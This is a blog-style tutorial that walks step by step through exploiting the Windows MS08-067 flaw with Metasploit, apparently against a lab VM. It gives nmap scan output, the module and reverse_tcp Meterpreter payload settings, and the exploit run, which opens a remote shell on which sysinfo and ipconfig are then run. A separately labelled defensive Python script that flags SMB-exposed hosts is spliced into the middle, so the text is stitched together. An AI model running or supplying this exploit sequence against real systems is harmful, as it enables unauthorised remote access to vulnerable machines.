
MS08-067 Sploit

Category: System/Metasploit  2016. 3. 18. 01:58

This is done on Kali Linux or BackTrack.

Metasploit homepage



MS08-067 vulnerability
https://technet.microsoft.com/library/security/ms08-067
https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi

Host port scan

root@kali:~# nmap -v -sT 200.200.200.44

Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-16 22:01 EDT
Initiating ARP Ping Scan at 22:01
Scanning 200.200.200.44 [1 port]
Completed ARP Ping Scan at 22:01, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:01
Completed Parallel DNS resolution of 1 host. at 22:01, 0.33s elapsed
Initiating Connect Scan at 22:01
Scanning 200.200.200.44 [1000 ports]
Discovered open port 445/tcp on 200.200.200.44
Discovered open port 139/tcp on 200.200.200.44
Completed Connect Scan at 22:01, 4.63s elapsed (1000 total ports)
Nmap scan report for 200.200.200.44
Host is up (0.00084s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:67:81:BB (VMware)

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 5.05 seconds
           Raw packets sent: 1 (28B) | Rcvd: 1 (28B)
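As an added defender-side check (example code written for this page, not part of the original post, nmap or Metasploit): a small Python parser that reads nmap's normal output and lists the hosts where SMB (139/445 TCP) is reachable, i.e. the hosts whose MS08-067 patch status should be verified. The first host in the sample is the scan result from the post; the second host and its ports are constructed.

```python
import re

# Constructed sample: the nmap -sT report from the post, plus a second host
# (200.200.200.45) made up to show a host that does NOT expose SMB.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 200.200.200.44
Host is up (0.00084s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:67:81:BB (VMware)

Nmap scan report for 200.200.200.45
Host is up (0.0010s latency).
PORT    STATE SERVICE
80/tcp  open  http
445/tcp filtered microsoft-ds
"""

# Ports used by the SMB/NetBIOS service MS08-067 lives behind.
SMB_PORTS = {139, 445}

REPORT_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_open_ports(text):
    """Return {host: {port: service}} for TCP ports nmap reports as 'open'."""
    hosts = {}
    current = None
    for line in text.splitlines():
        m = REPORT_RE.match(line)
        if m:
            current = m.group(1)
            hosts[current] = {}
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            port, proto, state, service = m.groups()
            # 'filtered' or 'closed' ports are not reachable, so they are skipped.
            if proto == "tcp" and state == "open":
                hosts[current][int(port)] = service
    return hosts


def smb_exposed_hosts(text):
    """Hosts with 139 or 445 open: candidates for an MS08-067 patch-status check."""
    return sorted(
        host for host, ports in parse_open_ports(text).items()
        if SMB_PORTS & ports.keys()
    )


if __name__ == "__main__":
    for host in smb_exposed_hosts(SAMPLE_NMAP_OUTPUT):
        print(f"{host}: SMB reachable, verify MS08-067 patch status")
```

Run it against the saved output of an `nmap -sT` sweep of your own range; each listed host should either have the MS08-067 update applied or have 139/445 blocked at the network edge.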


Host Metasploit

1. Run msfconsole

A database appears to be already configured, skipping initialization
                                                  
     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro
Learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.5-2016010401                   ]
+ -- --=[ 1517 exploits - 875 auxiliary - 257 post        ]
+ -- --=[ 437 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > 


2. Run ms08_067_netapi

msf > use exploit/windows/smb/ms08_067_netapi 
msf exploit(ms08_067_netapi) >


3. Check the options & set the target host IP

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > set RHOST 200.200.200.44
RHOST => 200.200.200.44
msf exploit(ms08_067_netapi) >


4. Select reverse_tcp as the payload

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp


5. Check the options

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    200.200.200.44   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) >


6. Set the payload IP / port
 . Set the listening host IP / port
  → The port number can be anything

msf exploit(ms08_067_netapi) > set LHOST 200.200.200.61
LHOST => 200.200.200.61
msf exploit(ms08_067_netapi) > set LPORT 4444
LPORT => 4444
msf exploit(ms08_067_netapi) >


7. exploit
 → A session is established with the target host

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 200.200.200.61:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:Korean
[*] Selected Target: Windows XP SP3 Korean (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (957487 bytes) to 200.200.200.44
[*] Meterpreter session 1 opened (200.200.200.61:4444 -> 200.200.200.44:4290) at 2016-03-17 11:44:25 -0400

meterpreter >


meterpreter

meterpreter > sysinfo
Computer        : KJK-9EB673B1C66
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : ko_KR
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > ipconfig

Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1


Interface  2
============
Name         : AMD PCNET Family PCI Ethernet Adapter 
Hardware MAC : 00:0c:29:67:81:bb
MTU          : 1500
IPv4 Address : 200.200.200.44
IPv4 Netmask : 255.255.255.0

meterpreter > 

